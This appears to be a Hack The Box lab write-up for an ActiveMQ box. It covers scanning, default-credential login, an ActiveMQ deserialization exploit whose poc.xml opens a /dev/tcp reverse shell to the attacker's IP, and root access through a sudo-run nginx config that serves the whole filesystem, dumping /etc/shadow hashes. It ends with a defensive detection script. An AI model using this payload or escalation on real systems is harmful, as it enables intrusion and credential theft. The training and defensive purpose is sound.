#hackthebox #easy #linux #nginx #activemq

![[Pasted image 20250808222306.png]]

# Information Gathering - Nmap

As always, I started off with scanning all TCP ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-09 01:23 UTC
Nmap scan report for 10.10.11.243
Host is up (0.062s latency).
Not shown: 65079 closed tcp ports (reset), 447 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
1883/tcp  open  mqtt
5672/tcp  open  amqp
8161/tcp  open  patrol-snmp
36441/tcp open  unknown
61613/tcp open  unknown
61614/tcp open  unknown
61616/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 18.30 seconds
```

Then I scanned the open TCP ports again to gather more information.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80,1883,5672,8161,36441,61613,61614,61616
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-09 01:24 UTC
Nmap scan report for 10.10.11.243
Host is up (0.046s latency).

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp    open  http        nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp  open  mqtt
| mqtt-subscribe:
|   Topics and their most recent payloads:
|     ActiveMQ/Advisory/MasterBroker:
|_    ActiveMQ/Advisory/Consumer/Topic/#:
5672/tcp  open  amqp?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
|     AMQP
|     AMQP
|     amqp:decode-error
|_    7Connection from client using unsupported AMQP attempted
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
8161/tcp  open  http        Jetty 9.4.39.v20210325
|_http-title: Error 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: Jetty(9.4.39.v20210325)
36441/tcp open  tcpwrapped
61613/tcp open  stomp       Apache ActiveMQ
| fingerprint-strings:
|   HELP4STOMP:
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_    java.lang.Thread.run(Thread.java:750)
61614/tcp open  http        Jetty 9.4.39.v20210325
|_http-title: Site doesn't have a title.
|_http-server-header: Jetty(9.4.39.v20210325)
| http-methods:
|_  Potentially risky methods: TRACE
61616/tcp open  apachemq    ActiveMQ OpenWire transport 5.15.15
2 services unrecognized despite returning data.
If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.70 seconds
```

Lastly, I scanned the top 10 UDP ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-09 01:25 UTC
Nmap scan report for 10.10.11.243
Host is up (0.047s latency).

PORT     STATE         SERVICE
53/udp   closed        domain
67/udp   closed        dhcps
123/udp  closed        ntp
135/udp  open|filtered msrpc
137/udp  closed        netbios-ns
138/udp  closed        netbios-dgm
161/udp  closed        snmp
445/udp  open|filtered microsoft-ds
631/udp  closed        ipp
1434/udp closed        ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 5.10 seconds
```

---

# Enumeration

##### HTTP - TCP 80

When I navigate to the web page on port 80, it prompts me for a username and password.

![[Pasted image 20250808202751.png]]

I typed in `admin:admin` and it redirected me to the page below.

![[Pasted image 20250808202909.png]]

Clicking `Manage ActiveMQ broker` takes you to `/admin`. The `Broker` section shows the version. Let's search for any known public exploit or vulnerability.

![[Pasted image 20250808203057.png]]

`searchsploit` reveals a few known vulnerabilities.

![[Pasted image 20250808203313.png]]

I also looked up `ActiveMQ vulnerability` on Google and found the following GitHub repo.

![[Pasted image 20250808212121.png]]

I downloaded `exploit.py` and `poc.xml` from the repo. The `-h` flag on `exploit.py` kindly tells us what options to use.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 exploit.py -h
usage: exploit.py [-h] [-i IP] [-p PORT] [-u URL]

options:
  -h, --help       show this help message and exit
  -i, --ip IP      ActiveMQ Server IP or Host
  -p, --port PORT  ActiveMQ Server Port
  -u, --url URL    Spring XML Url
```

I configured `poc.xml` with my IP address and port.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat poc.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="
 http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
            <value>bash</value>
            <value>-c</value>
            <value>bash -i &gt;&amp; /dev/tcp/10.10.14.14/443 0&gt;&amp;1</value>
        </list>
        </constructor-arg>
    </bean>
</beans>
```

After a few tries, I got a reverse shell!

![[Pasted image 20250808213721.png]]

I found `user.txt` in `/home/activemq`.

```bash
activemq@broker:~$ ls
user.txt
activemq@broker:~$ cat user.txt
776...
```

# Privilege Escalation

`sudo -l` reveals that the `activemq` user can run `/usr/sbin/nginx` with `sudo` without a password.

```bash
activemq@broker:~$ sudo -l
Matching Defaults entries for activemq on broker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx
```

By supplying your own Nginx config file, you can make it run arbitrary commands as root.

- **`user root;`** → Runs the Nginx worker processes as the root user, so any file access has root privileges.
- **`events { worker_connections 1024; }`** → Standard Nginx events block; here it just sets the maximum number of simultaneous connections.
- **`http { server { ... } }`** → Defines an HTTP server block.
- **`listen 1337;`** → Listens on TCP port 1337.
- **`root /;`** → Sets the web root to `/` (the system's root directory).
- **`autoindex on;`** → Enables directory listing when there is no index file.
```nginx
user root;
events { worker_connections 1024; }
http {
    server {
        listen 1337;
        root /;
        autoindex on;
    }
}
```

Run `sudo /usr/sbin/nginx -c /tmp/wook.conf` and it starts an `nginx` instance as root, serving the entire filesystem over HTTP.

```bash
activemq@broker:/tmp$ sudo /usr/sbin/nginx -c /tmp/wook.conf
nginx: [emerg] bind() to 0.0.0.0:1337 failed (98: Unknown error)
nginx: [emerg] bind() to 0.0.0.0:1337 failed (98: Unknown error)
nginx: [emerg] bind() to 0.0.0.0:1337 failed (98: Unknown error)
nginx: [emerg] bind() to 0.0.0.0:1337 failed (98: Unknown error)
nginx: [emerg] bind() to 0.0.0.0:1337 failed (98: Unknown error)
nginx: [emerg] still could not bind()
```

The `bind()` errors (errno 98 is `EADDRINUSE`) only mean port 1337 was already taken, most likely by an earlier attempt that is still listening, which is why the request below still works. You can then access `http://$IP:1337/etc/shadow` or any other file that normally requires root permissions!

```bash
activemq@broker:/tmp$ curl localhost:1337/etc/shadow
root:$y$j9T$S6NkiGlTDU3IUcdBZEjJe0$sSHRUiGL/v4FZkWjU.HZ6cX2vsMY/rdFBTt25LbGxf1:19666:0:99999:7:::
daemon:*:19405:0:99999:7:::
bin:*:19405:0:99999:7:::
sys:*:19405:0:99999:7:::
sync:*:19405:0:99999:7:::
games:*:19405:0:99999:7:::
man:*:19405:0:99999:7:::
lp:*:19405:0:99999:7:::
mail:*:19405:0:99999:7:::
news:*:19405:0:99999:7:::
uucp:*:19405:0:99999:7:::
proxy:*:19405:0:99999:7:::
www-data:*:19405:0:99999:7:::
backup:*:19405:0:99999:7:::
list:*:19405:0:99999:7:::
irc:*:19405:0:99999:7:::
gnats:*:19405:0:99999:7:::
nobody:*:19405:0:99999:7:::
_apt:*:19405:0:99999:7:::
systemd-network:*:19405:0:99999:7:::
systemd-resolve:*:19405:0:99999:7:::
messagebus:*:19405:0:99999:7:::
systemd-timesync:*:19405:0:99999:7:::
pollinate:*:19405:0:99999:7:::
sshd:*:19405:0:99999:7:::
syslog:*:19405:0:99999:7:::
uuidd:*:19405:0:99999:7:::
tcpdump:*:19405:0:99999:7:::
tss:*:19405:0:99999:7:::
landscape:*:19405:0:99999:7:::
fwupd-refresh:*:19405:0:99999:7:::
usbmux:*:19474:0:99999:7:::
lxd:!:19474::::::
activemq:$y$j9T$5eMce1NhiF0t9/ZVwn39P1$pCfvgXtARGXPYDdn2AVdkCnXDf7YO7He/x666g6qLM5:19666:0:99999:7:::
_laurel:!:19667::::::
```

Got `root.txt`.
```bash
activemq@broker:/tmp$ curl localhost:1337/root/root.txt
b6c...
```
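As an added defensive check (not part of this writeup or of the exploit repo it uses), the script below covers both artefacts from the box: it parses a Spring bean XML like `poc.xml` and flags beans whose class spawns a process, and it lints an nginx config for the `user root` / `root /` / `autoindex on` combination that turned `sudo nginx -c` into a root file server. The sample XML and config are constructed here, and the XML runs `id` instead of a reverse shell.

```python
import re
import xml.etree.ElementTree as ET

SPRING_NS = "{http://www.springframework.org/schema/beans}"
# Bean classes that run an OS command when Spring instantiates them
# (short list for this example; extend it for real use).
PROCESS_CLASSES = {"java.lang.ProcessBuilder", "java.lang.Runtime"}

def spring_xml_findings(xml_text):
    """Return (bean id, class, init-method, constructor values) for each
    bean that spawns a process, i.e. the pattern poc.xml relies on."""
    findings = []
    for bean in ET.fromstring(xml_text).iter(SPRING_NS + "bean"):
        if bean.get("class") in PROCESS_CLASSES:
            values = [v.text for v in bean.iter(SPRING_NS + "value")]
            findings.append((bean.get("id"), bean.get("class"),
                             bean.get("init-method"), values))
    return findings

def nginx_conf_findings(conf_text):
    """Return the settings that turn `sudo nginx -c <file>` into a
    root-owned file server: workers as root, web root at /, listing on."""
    found = dict(re.findall(r"\b(user|root|autoindex)\b\s+([^;]+);", conf_text))
    problems = []
    if found.get("user") == "root":
        problems.append("worker processes run as root")
    if found.get("root") == "/":
        problems.append("document root is the filesystem root")
    if found.get("autoindex") == "on":
        problems.append("directory listing enabled")
    return problems

# Constructed samples modelled on the writeup's two files (XML runs `id`, not a shell).
SAMPLE_XML = """<beans xmlns="http://www.springframework.org/schema/beans">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg><list>
      <value>bash</value><value>-c</value><value>id</value>
    </list></constructor-arg>
  </bean>
</beans>"""
SAMPLE_CONF = """user root;
events { worker_connections 1024; }
http { server { listen 1337; root /; autoindex on; } }
"""

if __name__ == "__main__":
    for bean_id, cls, init, values in spring_xml_findings(SAMPLE_XML):
        print(f"bean {bean_id}: {cls} init-method={init} runs {values}")
    for problem in nginx_conf_findings(SAMPLE_CONF):
        print("nginx:", problem)
```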